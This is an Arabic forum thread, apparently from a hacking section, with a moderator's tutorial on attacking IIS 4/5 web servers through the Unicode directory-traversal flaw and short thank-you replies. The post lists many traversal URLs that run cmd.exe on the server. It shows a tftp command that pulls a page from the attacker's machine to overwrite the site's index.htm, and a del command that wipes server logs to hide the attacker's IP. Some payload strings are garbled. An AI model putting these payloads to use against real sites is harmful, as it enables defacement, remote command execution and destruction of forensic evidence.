zagora
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

zagora

منتديات زاكورة
 
الرئيسيةأحدث الصورالتسجيلدخول
السلام عليكم في القريب العاجل ان شاء الله سوف تفتح مقاولة
زاكورة كلوب المتخصصة في مجال المعلوميات ابوابها اما الزبائن والاشخاص العاديينعن الادارة

 

 تعلم إختراق المواقع للأذكياء

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
kaka
مشرف عام
مشرف عام
kaka


ذكر
عدد الرسائل : 238
العمر : 34
البلد : maroc
عارضة الطاقة :
تعلم إختراق المواقع للأذكياء Left_bar_bleue0 / 1000 / 100تعلم إختراق المواقع للأذكياء Right_bar_bleue

السٌّمعَة : 0
نقاط : 0
تاريخ التسجيل : 05/07/2007

تعلم إختراق المواقع للأذكياء Empty
مُساهمةموضوع: تعلم إختراق المواقع للأذكياء   تعلم إختراق المواقع للأذكياء I_icon_minitimeالثلاثاء 7 أغسطس - 13:43



السلام عليكم ورحمة الله وبركاته ..... اليوم اقدم لكم طريقه في اختراق المواقع وهي طريقه من عدة طرق ارجو الحذر والانتباه .....

IIS بداية نعرف ماهي

هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي IISالـ

IIS5.0...وويندوز الفين يمتلك الاصدارة الخامسة من ملقم معلومات الانترنت

بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس 4 او 5 وهذه النقطة تستغل بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامةً يفكرون الان في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن لا هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الاضعاف الموجودة في الان تي
لكن بتلك الطريقة قد يكونون جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي :
http://www.xxxxxx.com/scripts/..&Aa....exe?/c+dir+c:\
ركزو هنا الان بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي c:هذه الثغرة تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c :\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+ c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+d ir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/ c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.ex e?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd .exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%8 0\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال :
http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c\+
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32 ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في تنفيذها
مثال:
http://www.xxxxxx.com/scripts/..&Aa....exe?/c+dir+c:\
هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لاحظ التغير
http://www.xxxxxx.com/scripts/..&Aa.../Winnt/Sytem32/
ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز Winnt\Sytem32\
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون ..... الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط للتطابقها يجب عليك الدخول باي كان على مللف السستم
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\
ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا الامتداد
c+dir+c:\هنا تضيف أسماء الملفات
http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/
كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لان هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن الله تعبك ماهو رايح على الفاضي
.................................................. .......................................
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان
www.geocities.com/anorR1234/tftpd32.zip
C:\وبعد ماتنزل البرنامج وتفك الضغط منه من الافضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الأساسية
C:\أسمع كلامي وحط كل شي في
لأنك لو حطيتها بإذن الله راح تنجح المهمه
-----------------------------------------------------------------
الان بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل الابلود
أي
أبلود = تحميل
مو تجميل
وتحميل الملفات طريقة معقدة نسبياً بس أنا متفائل بالخير لأني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضاً الى المتصفح
وتضاف بهذه الطريقة
مثال :
http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\
تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الإضافات من الثغرة لكي تضيف امر النسخ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. ht m
يعني الى راح نمسحه من الثغرة بيكون هذه الاضافة
/c+dir+c:\
عشان تظيف بدالها
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. ht m
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.e xe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. ht m
شايفين ياشباب إش الى اتغير
بس لازم أيضاً إنك تغير اللازم في أمر النسخ
مثل
tftp.exe هذا سيبه في حاله لانه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الان
"-i" هذا برضه سيبه لانه مهم
1.1.1.1 هنا بدال الارقام هذا تكتب الايبي تبع جهازك وعشان تتأكد من الايبي لمن تشغب التي اف تي بي راح يطلع ايبي وهذا الايبي الى طلعلك هو الى تكتبه
GET هذه الاضافة سيبها في حالها لانها تعتبر شرط في نسخ المفات
index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
C:\inetpub\wwwroot\ وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
C:\يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htm ومثلا اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الان صارت مشابها لمثل هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.e xe+"-i"+212.212.212.212+GET+index.htm+C:\inetpub\www roo t\ index.htm
ولو طلعت مشابها لها اضغط إنتر وتوكل على الله
وبإذن الله راح يتنسخ الملف
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
وفى النقطة الاخيرة والاهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل الايبي
http://server/msadc/..À¯../..../c+del+c:/*.log
--------------------------------------
وهذه لنكات لكي تسد الثغرة داخل موقعك اذا كانت شغالة
Patches to repair this Bug:

IIS 4.0 on WinNT 4http://www.microsoft.com/ntserver/nts/downloads/c ritical/q269862/default.asp
IIS 5.0 on Win2000
http://www.microsoft.com/windows200...862/default.asp
تعلم إختراق المواقع للأذكياء 44
kaka-lverus
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://mounir2205.net.tc
زهرة الحب
زاكوري جديد
زاكوري  جديد
زهرة الحب


انثى
عدد الرسائل : 24
عارضة الطاقة :
تعلم إختراق المواقع للأذكياء Left_bar_bleue50 / 10050 / 100تعلم إختراق المواقع للأذكياء Right_bar_bleue

السٌّمعَة : 0
نقاط : 0
تاريخ التسجيل : 18/07/2007

تعلم إختراق المواقع للأذكياء Empty
مُساهمةموضوع: رد: تعلم إختراق المواقع للأذكياء   تعلم إختراق المواقع للأذكياء I_icon_minitimeالخميس 18 أكتوبر - 7:32

شكرا كاكا



يجب أن نتعلم قانون الهاكر لكي لا نكون ضحاياه
فالهاكر لا يحمي المغفلين

»-(¯`·.· ¯)->kaka»-(¯`·.· ¯)->
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Momo Moya
مشرف عام
مشرف عام
Momo Moya


ذكر
عدد الرسائل : 644
العمر : 35
البلد : المانيا
عارضة الطاقة :
تعلم إختراق المواقع للأذكياء Left_bar_bleue50 / 10050 / 100تعلم إختراق المواقع للأذكياء Right_bar_bleue

أختر دولتك : تعلم إختراق المواقع للأذكياء Male_g10
السٌّمعَة : 0
نقاط : 3
تاريخ التسجيل : 11/10/2007

تعلم إختراق المواقع للأذكياء Empty
مُساهمةموضوع: رد: تعلم إختراق المواقع للأذكياء   تعلم إختراق المواقع للأذكياء I_icon_minitimeالجمعة 19 أكتوبر - 13:56

مشكوور مشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوورمشكوور
مشكوورمشكوورمشكوور
مشكوورمشكوور
مشكوور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://www.facebook.com/groups/zagoramaroc/
 
تعلم إختراق المواقع للأذكياء
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» :: اختراق المواقع للمبتدئين ::
» حـــــصـــــ كيف تخترك المواقع ــري||زاكورة كلوب||
» حـــــصـــــ كيف تخترك المواقع ــري||زاكورة كلوب||
» يا شباب ،، هذه طريقة لاختراق أقوى المواقع في العالم
» لا داعي للبحث .....أحسن المواقع لفك شفرة الجوالات

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
zagora :: منتدى الهكر :: منتدى اختراق المواقع و المنتديات-
انتقل الى: